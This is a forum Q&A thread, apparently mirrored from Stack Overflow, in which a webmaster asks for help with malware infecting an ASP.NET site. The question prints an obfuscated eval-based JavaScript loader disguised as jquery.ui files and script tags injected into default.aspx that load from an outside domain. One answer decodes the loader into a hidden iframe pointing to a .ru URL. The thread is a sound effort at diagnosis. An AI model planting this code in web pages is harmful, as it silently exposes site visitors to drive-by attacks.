2

这真让我抓狂。我认为我的网站被某种病毒感染了,这是发生了什么:

服务器上出现随机 javascript 文件,其名称如jquery.ui.dialog.min.jsjquery.ui.button.min.js。所有这些文件都包含相同的代码:

s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){f=(q)?"fromCharCode":2;h=-016/7;try{eval("a=prototype");}catch(zxc){e=window["e"+"va"+"l"];n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388.545.202.96.460.570.198.183.136.520.232.348.448.290.94.141.396.485.226.360.388.570.222.138.456.585.94.297.444.585.220.348.196.260.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.170.64.345.396.570.222.324.432.525.220.309.244.170.194.351.464.555.68.96.408.570.194.327.404.490.222.342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.194.327.404.310.78.123.236.65.20".split(".");if(window.document)for(i=6-2-1-2-1;-161+i!=2-2;i++){k=i;s=s+String[f](n[k]/(i%(h*h)+2));}e(s);}}

主要问题是这个“病毒”在我default.aspx破坏服务器的时候附加了一行代码。这是它正在添加的内容:

<asp:Content ID="Content1" ContentPlaceHolderID="cphBody" Runat="Server">
//Code here
</asp:Content>**<script type="text/javascript" language="javascript" src="http://easydiablo3.com//ImageStorage/jquery.ui.button.min.js" ></script><script type="text/javascript" language="javascript" src="http://easydiablo3.com//themes/jquery.ui.dialog.min.js" ></script>**

如果我删除文件,它们会在一段时间后出现。有谁知道我该如何解决这个问题?

4

2 回答 2

2

使用此链接检测受感染的文件/文件夹

http://sitecheck.sucuri.net/scanner/

于 2012-07-03T11:17:17.407 回答
1

该代码是eval()您页面中的以下代码

<iframe src="http://caqxaro.ru/count14.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

您可能在应用程序的某个地方存在漏洞,检查您的数据库是否有奇怪的值,如果您使用的是 joomla 等 CMS,请检查升级。然后如果可能的话,恢复您应用程序的最新备份。

于 2012-07-03T11:20:10.877 回答